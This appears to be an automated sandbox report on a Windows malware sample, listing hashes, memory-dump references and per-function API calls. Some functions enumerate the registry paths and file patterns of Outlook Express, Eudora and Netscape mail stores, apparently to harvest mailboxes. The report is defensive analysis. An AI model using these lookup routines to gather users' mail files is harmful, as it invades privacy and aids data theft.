Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a39cbf1c308326511ff5642cd54a82daf1f31bbc3351866682b553bf2a6457e3
Instruction ID: e74b98df45fc665b64573009a91a590fcc7687289f2f59e07e41eb127ce892fd
Opcode Fuzzy Hash: a39cbf1c308326511ff5642cd54a82daf1f31bbc3351866682b553bf2a6457e3
Instruction Fuzzy Hash: 04312972D417108FD388EFB6EC8785936A1FBD1319301823FE9079702ADE3C19468A9E

Function 00418B59 Relevance: 1.6, APIs: 1, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?), ref: 00418B6B

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 5a69c1c331f42020c059c0b88fda7c5dfd5e3c2c8a3ea7c9b194b3151677bf91
Instruction ID: 457b1e5199887fec2ea5b2679d8279c6e9aa396d5520c37bdf03ac6dd4622e4d
Opcode Fuzzy Hash: 5a69c1c331f42020c059c0b88fda7c5dfd5e3c2c8a3ea7c9b194b3151677bf91
Instruction Fuzzy Hash: 9D41337AD403308FD7C9DF75ED8AC6A3662BB80310385953EE542C7569EE782A02869D

Function 004190F1 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3)&, xrefs: 00419131

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID:
String ID: 3)&
API String ID: 0-1327995085
Opcode ID: af67193a621a8068867f1bbfdde23d68ace7f80acd072bcfeb37658323e428ca
Instruction ID: 654aee75e3edf79405b5e51b5bbc48cd697a7d280a5722c181fb33c7cab06a84
Opcode Fuzzy Hash: af67193a621a8068867f1bbfdde23d68ace7f80acd072bcfeb37658323e428ca
Instruction Fuzzy Hash: 1931D4B39507248BD388EFBAEC868597763F7C0319346823EE446D3566DF3928018A9C

Function 0042E02D Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0042E042

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1dc0f340f8bf1a951e526b88a435527fb852ef7298db011b6916b964b77fb5e1
Instruction ID: 69bc7141aaeb8134f9a2c167ac85ae3fa515dfd92f4c43fc3a12c167a75adb2e
Opcode Fuzzy Hash: 1dc0f340f8bf1a951e526b88a435527fb852ef7298db011b6916b964b77fb5e1
Instruction Fuzzy Hash: 76D05E766503055ADB105FB17D08B723BDCE384399F004436F91DC61A0F5B4C540D549

Non-executed Functions

Function 00452910 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 228registrystringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,Identities), ref: 00452939
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00452952
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00452971
RegCloseKey.ADVAPI32(?), ref: 00452982
lstrcatW.KERNEL32(?,00479B04), ref: 004529A4
lstrcatW.KERNEL32(?,?), ref: 004529B8
lstrcatW.KERNEL32(?,\Software\Microsoft\Outlook Express), ref: 004529CA
RegCloseKey.ADVAPI32(?), ref: 004529D7
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 004529F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00452A13
RegCloseKey.ADVAPI32(?), ref: 00452A24
RegCloseKey.ADVAPI32(?), ref: 00452A41
lstrcatW.KERNEL32(?,00479B50), ref: 00452A53
lstrcatW.KERNEL32(?,?), ref: 00452A67
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00452A80

Strings

*.dbx, xrefs: 00452BC0
Store Root, xrefs: 00452AC5
\Software\Microsoft\Outlook Express, xrefs: 004529BE
Identities, xrefs: 0045292D

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrcat$Close$Open$Enum$lstrcpy
String ID: *.dbx$Identities$Store Root$\Software\Microsoft\Outlook Express
API String ID: 1598505564-103321312
Opcode ID: a325dcfb69a0292fec03e1f3fe62d0db494e4b178a1431543cbc020985c705ba
Instruction ID: 077af9b5cfd28930e7160121756d224766af220fd7b27bf759fd83c916a0899f
Opcode Fuzzy Hash: a325dcfb69a0292fec03e1f3fe62d0db494e4b178a1431543cbc020985c705ba
Instruction Fuzzy Hash: 8E9194B0A443289BDB20DF60CD45FE97379BB44700F00859AFA8966292DBF566C4CF15

Function 00452350 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 193registrystringfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,Software\Qualcomm\Eudora), ref: 00452379
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00452392
RegEnumKeyW.ADVAPI32(?,?,?,00000104), ref: 004523D5
RegCloseKey.ADVAPI32(?), ref: 004523E6
lstrcpyW.KERNEL32(?,?), ref: 0045241A
RegCloseKey.ADVAPI32(?), ref: 00452427
lstrcatW.KERNEL32(?,00479C70), ref: 00452439
lstrcatW.KERNEL32(?,?), ref: 0045244D
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00452466
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00452489
RegCloseKey.ADVAPI32(?), ref: 0045249A
lstrcatW.KERNEL32(?,00479C7C), ref: 0045250C
lstrcatW.KERNEL32(?,*.mbx*), ref: 00452568
FindFirstFileW.KERNEL32(?,?), ref: 0045257C

Strings

Software\Qualcomm\Eudora, xrefs: 0045236D
*.mbx*, xrefs: 0045255C

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrcat$Close$EnumOpenlstrcpy$FileFindFirst
String ID: *.mbx*$Software\Qualcomm\Eudora
API String ID: 1514284114-244562183
Opcode ID: 2e5f31079fa9f81a142c337dd2a43126c1793cf2dd26496f27271c92e9fe9ace
Instruction ID: e7256639e39bc0285eb9c1791ad899ae4bc0287cf2b1ee02969d26ab627671b8
Opcode Fuzzy Hash: 2e5f31079fa9f81a142c337dd2a43126c1793cf2dd26496f27271c92e9fe9ace
Instruction Fuzzy Hash: 5F7195B1A40218EBDB24DBA0DC85FE97378BB45704F10419AF78967291E7F466C4CF19

Function 00452640 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 175registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000001,Software\Netscape\Netscape Installer,?), ref: 0045266E
RegQueryValueExW.ADVAPI32(?,Install Directory,00000000,?,?,?), ref: 004526A5
RegCloseKey.ADVAPI32(?), ref: 004526B6
RegCloseKey.ADVAPI32(?), ref: 004526D3

Strings

Netscape Browser, xrefs: 004526EB
\Mail\, xrefs: 004527E2
Users\, xrefs: 00452713
Install Directory, xrefs: 00452699
Software\Netscape\Netscape Installer, xrefs: 00452664
5, xrefs: 00452751

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
